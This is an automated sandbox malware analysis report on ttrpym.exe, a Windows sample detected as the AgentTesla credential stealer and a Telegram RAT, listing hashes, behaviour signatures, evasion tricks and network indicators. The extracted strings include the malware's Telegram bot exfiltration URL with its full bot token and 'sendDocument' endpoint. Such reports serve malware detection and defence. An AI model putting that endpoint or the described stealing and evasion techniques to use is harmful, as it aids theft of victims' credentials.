Analysis Report ttrpym.exe

Overview

General Information

Sample Name: ttrpym.exe
Analysis ID: 345001
MD5: 3b53c639bd8ea883e5036a040f833415
SHA1: af2f707e2e787879a67994fbad96c3e2f418dd3a
SHA256: eca6a35d952f84597c3917f4c77f8c0e2cdeea6101caa97906dc1904e6f9e0ea
Tags: exe

Detection

AgentTesla Telegram RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses the Telegram API (likely for C&C communication)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • ttrpym.exe (PID: 6400 cmdline: 'C:\Users\user\Desktop\ttrpym.exe' MD5: 3B53C639BD8EA883E5036A040F833415)
    • ttrpym.exe (PID: 6732 cmdline: {path} MD5: 3B53C639BD8EA883E5036A040F833415)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: ttrpym.exe PID: 6732 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: ttrpym.exe PID: 6732 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.ttrpym.exe.f80000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: ttrpym.exe, ReversingLabs: Detection: 50%
Machine Learning detection for sample
Source: ttrpym.exe, Joe Sandbox ML: detected
Source: 3.2.ttrpym.exe.f80000.2.unpack, Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files
Source: ttrpym.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\ttrpym.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Uses secure TLS version for HTTPS connections
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: ttrpym.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown, DNS query: name: api.telegram.org
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: C:\Users\user\Desktop\ttrpym.exe, Code function: 3_2_012BA09A recv
Source: unknown, DNS traffic detected: queries for: api.telegram.org
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: ttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpString found in binary or memory: http://cert.s
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: ttrpym.exe, 00000000.00000003.235365275.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://en.w
              Source: ttrpym.exe, 00000000.00000003.234788164.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: ttrpym.exe, 00000003.00000003.469945835.0000000007DCC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.c
              Source: ttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
              Source: ttrpym.exe, 00000003.00000003.522255884.0000000007DEC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: http://pmTUNK.com
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: ttrpym.exe, 00000000.00000003.242053272.0000000005E83000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
              Source: ttrpym.exe, 00000000.00000003.241273039.0000000005E83000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlXUJl
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
              Source: ttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comEacdW
              Source: ttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comad
              Source: ttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comamFA
              Source: ttrpym.exe, 00000000.00000003.239366599.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comd
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comdd
              Source: ttrpym.exe, 00000000.00000003.239292340.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comes
              Source: ttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comexc
              Source: ttrpym.exe, 00000000.00000003.238931261.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comhly
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comkYF=
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comma
              Source: ttrpym.exe, 00000000.00000003.239779476.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-u
              Source: ttrpym.exe, 00000000.00000003.239201394.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comroa
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comt;F
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: ttrpym.exe, 00000000.00000003.245883722.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers)Y
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: ttrpym.exe, 00000000.00000003.245848821.0000000005E9E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
              Source: ttrpym.exe, 00000000.00000003.245848821.0000000005E9E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlH
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: ttrpym.exe, 00000000.00000003.245072326.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html.
              Source: ttrpym.exe, 00000000.00000003.245112917.0000000005E9E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlP
              Source: ttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/m
              Source: ttrpym.exe, 00000000.00000003.243841900.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/s
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: ttrpym.exe, 00000000.00000003.244251584.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?Y0
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: ttrpym.exe, 00000000.00000003.244027978.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersL
              Source: ttrpym.exe, 00000000.00000003.244441566.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerskYlH
              Source: ttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comgritaC
              Source: ttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comm
              Source: ttrpym.exe, 00000000.00000002.264530973.00000000016D7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comttvaZ
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: ttrpym.exe, 00000000.00000003.238052266.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: ttrpym.exe, 00000000.00000003.238160822.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/m
              Source: ttrpym.exe, 00000000.00000003.237899138.0000000005E80000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnm
              Source: ttrpym.exe, 00000000.00000003.238437682.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnomp
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: ttrpym.exe, 00000000.00000003.247619500.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: ttrpym.exe, 00000000.00000003.247669599.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmJU
              Source: ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: ttrpym.exe, 00000000.00000003.243086872.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
              Source: ttrpym.exe, 00000000.00000003.247619500.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.2J
              Source: ttrpym.exe, 00000000.00000003.233656365.0000000005E62000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: ttrpym.exe, 00000000.00000003.233656365.0000000005E62000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comt
              Source: ttrpym.exe, 00000000.00000003.242053272.0000000005E83000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: ttrpym.exe, 00000000.00000003.237222343.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.c
              Source: ttrpym.exe, 00000000.00000003.237222343.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krl
              Source: ttrpym.exe, 00000000.00000003.237159926.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krs-c
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: ttrpym.exe, 00000000.00000003.240021767.0000000005E7B000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.239945309.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
              Source: ttrpym.exe, 00000000.00000003.239902821.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comp
              Source: ttrpym.exe, 00000000.00000003.238437682.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comrporation
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: ttrpym.exe, 00000000.00000003.246313205.0000000005E88000.00000004.00000001.sdmp, ttrpym.exe, 00000000.00000003.243655870.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
              Source: ttrpym.exe, 00000000.00000002.272513220.0000000007072000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: ttrpym.exe, 00000000.00000003.243771789.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deoi
              Source: ttrpym.exe, 00000000.00000003.243571729.0000000005E7D000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dewa
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnad
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnamFA
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnj
              Source: ttrpym.exe, 00000000.00000003.239436981.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnma
              Source: ttrpym.exe, 00000000.00000003.238783173.0000000005E7B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnr-c
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%(
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
              Source: ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
              Source: ttrpym.exe, 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/sendDocument
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1534863067:AAHgkXiWvRLedLdzn8NhreUVQl7GIuV0U6g/sendDocumentdocument-----
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgx&.q
              Source: ttrpym.exe, 00000003.00000002.619638629.000000000343E000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.orgx&.qloN
              Source: ttrpym.exe, 00000003.00000003.469945835.0000000007DCC000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repositor
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: ttrpym.exe, 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: ttrpym.exe, 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: C:\Users\user\Desktop\ttrpym.exe Window created: window name: CLIPBRDWNDCLASS

              System Summary:

              .NET source code contains very large array initializations
              Source: 3.2.ttrpym.exe.f80000.2.unpack, <PrivateImplementationDetails>{8C8394AE-6C21-4245-BDCB-313DD2DA3E81}/143B5B42-09A4-4DE1-9DA9-7F3805A0F092.cs Large array initialization: .cctor: array initializer size 12026
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012BAD42 NtQuerySystemInformation,3_2_012BAD42
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012BAD20 NtQuerySystemInformation,3_2_012BAD20
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: String function: 00410D6C appears 44 times
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: String function: 0040443A appears 44 times
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: String function: 004044F1 appears 63 times
              Source: ttrpym.exe, 00000000.00000002.272887494.0000000008D80000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs ttrpym.exe
              Source: ttrpym.exe, 00000000.00000002.263886998.0000000000C60000.00000002.00020000.sdmp Binary or memory string: OriginalFilename vs ttrpym.exe
              Source: ttrpym.exe, 00000003.00000002.614307739.0000000000FCE000.00000002.00000001.sdmp Binary or memory string: OriginalFilenametTIrQqSUbanmBpkFjGvOpEbqCmHMJjJZ.exe4 vs ttrpym.exe
              Source: ttrpym.exe, 00000003.00000002.614132584.0000000000B80000.00000002.00020000.sdmp Binary or memory string: OriginalFilename vs ttrpym.exe
              Source: ttrpym.exe Binary or memory string: OriginalFilename vs ttrpym.exe
              Source: C:\Users\user\Desktop\ttrpym.exe Section loaded: security.dll
              Source: ttrpym.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: ttrpym.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.cs Cryptographic APIs: 'CreateDecryptor'
              Source: ttrpym.exe, 00000000.00000003.250562979.0000000005E7B000.00000004.00000001.sdmp Binary or memory string: Century Schoolbook is a registered trademark of The Monotype Corporation plc.slnt+n\
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@26/2
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012BA5B6 AdjustTokenPrivileges,3_2_012BA5B6
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012BA57F AdjustTokenPrivileges,3_2_012BA57F
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ttrpym.exe.log
              Source: C:\Users\user\Desktop\ttrpym.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
              Source: C:\Users\user\Desktop\ttrpym.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\ttrpym.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
              Source: C:\Users\user\Desktop\ttrpym.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\ttrpym.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Users\user\Desktop\ttrpym.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Users\user\Desktop\ttrpym.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\ttrpym.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: ttrpym.exe ReversingLabs: Detection: 50%
              Source: unknown Process created: C:\Users\user\Desktop\ttrpym.exe 'C:\Users\user\Desktop\ttrpym.exe'
              Source: unknown Process created: C:\Users\user\Desktop\ttrpym.exe {path}
              Source: C:\Users\user\Desktop\ttrpym.exe Process created: C:\Users\user\Desktop\ttrpym.exe {path}
              Source: C:\Users\user\Desktop\ttrpym.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: ttrpym.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: C:\Users\user\Desktop\ttrpym.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
              Source: ttrpym.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              .NET source code contains potential unpacker
              Source: ttrpym.exe, GuideListFormatter/GuideListFormatter.cs .Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.ttrpym.exe.b80000.0.unpack, GuideListFormatter/GuideListFormatter.cs .Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.ttrpym.exe.b80000.0.unpack, GuideListFormatter/GuideListFormatter.cs .Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 3.2.ttrpym.exe.aa0000.1.unpack, GuideListFormatter/GuideListFormatter.cs .Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 3.0.ttrpym.exe.aa0000.0.unpack, GuideListFormatter/GuideListFormatter.cs .Net Code: Application_Parameters System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 0_2_02DBD5EB push 0000005Dh; retn 0004h 0_2_02DBD65D
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_0041C45C push cs; iretd 3_2_0041C532
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_0041C55E push cs; iretd 3_2_0041C532
